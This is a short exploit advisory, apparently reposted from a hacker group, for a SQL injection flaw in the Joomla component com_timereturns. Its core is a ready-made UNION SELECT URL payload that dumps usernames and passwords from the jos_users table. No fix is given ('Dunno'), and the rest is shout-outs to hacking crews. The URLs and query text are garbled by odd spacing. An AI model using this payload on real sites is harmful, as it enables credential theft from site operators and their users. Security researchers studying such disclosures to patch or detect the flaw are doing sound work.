Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability ##
Author: kaMtiEz www.2cto.com
######################################## ##############################
[Software Information]
Developer: http://www.takeaweb.it/
: Http://www.takeaweb.it/index.php? Option = com_dms & view = category & layout = table & Itemid = 13
Affected Versions: 2.0 or lower maybe also affected
######################################## ######################################## #############################
[Defect file]
The http://www.bkjia.com/[kaMtiEz]/index. php? Option = com_timereturns & view = timereturns & id = [num]
[XpL]
The http://www.bkjia.com/[kaMtiEz]/index. php? Option = com_timereturns & view = timereturns & id = 7 + union + all + select + concat_ws (0x3a, username, password), 2, 3, 4, 5, 6 + from + jos_users --
[FIX]
Dunno: ">
######################################## ######################################## #############################
[Thx TO]
[+] INDONESIANCODER-EXPLOIT-ID-magelangcyber team-malangcyber crew-KILL-9
[+] Tukulesto, arianom, el-farhatz, Jundab, Ibl13Z, Ulow, s1do3L, Boebefa, Hmei7, RyanAby, Albert twired, GonzHack, n4kuLa
[+] Lagripe-Dz, KedAns-Dz, By_aGreSiF, t0r3x, Mboys, Contrex, Gh4mb4S, jos_ali_joe, keys, n4sss, r3m1ck, k4mpr3t0
[+] Yur4kh4, xr0b0t, kido, trycyber, n4ck0, Caddy-Dz, pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2: D
[NOTE]
[+] Halal Bihalal sukses mas dab :))
[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)
[+] Hellcome in MGL jos_ali_joe = ))
[QUOTE]
[+] INDONESIANCODER still r0x
[+] Nothing secure ..